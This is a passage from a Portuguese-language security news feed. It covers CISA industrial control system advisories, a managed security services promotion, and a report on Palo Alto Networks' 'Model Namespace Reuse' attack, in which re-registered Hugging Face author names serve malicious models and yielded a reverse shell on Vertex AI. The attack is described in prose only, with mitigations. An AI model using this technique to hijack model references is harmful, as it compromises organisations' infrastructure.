  Atualização para falhas em inversores da EG4 que podem afetar operações de energia renovável e geração elétrica.
• ICSA-25-233-01 Mitsubishi Electric MELSEC iQ-F CPU Module (Update A)
  Atualização sobre vulnerabilidades em módulos de CPU da série MELSEC iQ-F, que controlam processos industriais de automação.
• ICSA-25-226-31 Rockwell Automation 1756-ENT2R, 1756-EN4TR, 1756-EN4TRXT (Update A)
  Atualização referente a falhas em módulos de comunicação da Rockwell, impactando a resiliência da conectividade industrial.

Recomendações da CISA

A CISA recomenda que administradores e equipes de segurança revisem imediatamente os avisos técnicos completos, apliquem as correções e medidas de mitigação sugeridas, e avaliem o impacto potencial em seus ambientes.

A publicação desses avisos reforça a importância de monitorar continuamente vulnerabilidades em ICS e de aplicar práticas robustas de gestão de patches e segurança operacional para proteger infraestruturas críticas.

Para saber mais, clique aqui.

The post CISA divulga 14 novos avisos de segurança para sistemas de controle industrial appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O cenário atual da Segurança da Informação é, ao mesmo tempo, complexo e desafiador. Com o avanço das tecnologias digitais, a superfície de ataque das organizações se expandiu significativamente — e, com ela, o número de vulnerabilidades e riscos.

A falta de mão de obra qualificada tem sido constantemente apontada como uma das principais barreiras para uma gestão eficaz da Segurança da Informação. Além disso, a retenção de talentos na área é um desafio recorrente: altos índices de rotatividade e escassez de profissionais experientes dificultam a continuidade e a maturidade dos programas de segurança.

Leia o artigo completo no blog da Clavis:
https://clavis.com.br/mss-como-estrategia-de-negocio/

The post MSS como estratégia de negócio: por que sua empresa precisa contar com um serviço gerenciado de Segurança da Informação appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Pesquisadores da Palo Alto Networks revelaram um novo método de ataque que representa um risco significativo para a cadeia de suprimentos de inteligência artificial (IA). A técnica, batizada de Model Namespace Reuse, foi demonstrada com impacto em produtos da Microsoft e Google, além de expor riscos potenciais para projetos de código aberto.

Como funciona o ataque Model Namespace Reuse

O ataque consiste em criminosos digitais registrarem nomes de modelos associados a contas que foram excluídas ou transferidas em plataformas como o Hugging Face, uma das mais populares para hospedagem e compartilhamento de modelos de IA.
Ao reutilizar esse “espaço de nomes”, os atacantes conseguem disponibilizar modelos maliciosos, permitindo inclusive a execução arbitrária de código.

Em termos práticos, quando um desenvolvedor referencia um modelo no formato Autor/NomeDoModelo, o invasor pode assumir o antigo nome do autor e criar um modelo com a mesma nomenclatura. Assim, aplicações que já utilizavam essa referência passam a puxar, sem saber, um modelo comprometido.

Demonstrações em plataformas do Google e Microsoft

Os pesquisadores da Palo Alto demonstraram a vulnerabilidade no Vertex AI, plataforma de machine learning do Google. Eles mostraram que era possível registrar um nome de conta antigo e injetar um payload que abria uma conexão reversa (reverse shell), garantindo acesso à infraestrutura por trás do modelo.

Um cenário semelhante foi identificado na Azure AI Foundry, da Microsoft, que também permite a importação de modelos do Hugging Face. Nesse caso, os pesquisadores conseguiram obter permissões equivalentes às de um endpoint Azure, abrindo caminho para acessos não autorizados ao ambiente da nuvem.

Impacto em projetos de código aberto

Além das grandes plataformas, a investigação revelou que milhares de repositórios open source também podem estar em risco por utilizarem referências no formato Autor/NomeDoModelo. Muitos desses projetos continuam funcionando normalmente, mesmo após a exclusão ou transferência do modelo original, o que dificulta a percepção da ameaça.

Reações e medidas de mitigação

Google, Microsoft e Hugging Face foram notificados sobre o problema. O Google já iniciou varreduras diárias para identificar modelos “órfãos” e mitigar abusos.
No entanto, segundo a Palo Alto Networks, a questão central continua representando risco a qualquer organização que confia apenas no nome do modelo. “Confiar apenas no nome de modelos não é suficiente e exige uma reavaliação crítica da segurança em todo o ecossistema de IA”, destacaram os pesquisadores.

Recomendações da Palo Alto Networks

Para reduzir os riscos do Model Namespace Reuse, as medidas sugeridas incluem:

• • Fixar modelos a commits específicos para evitar mudanças inesperadas.
• • Clonar e armazenar modelos em locais confiáveis, em vez de depender unicamente de serviços de terceiros.
• • Realizar varreduras proativas no código para identificar referências que possam representar risco.

Para saber mais, clique aqui.

The post Novo método de ataque à cadeia de suprimentos de IA é demonstrado contra produtos do Google e Microsoft appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.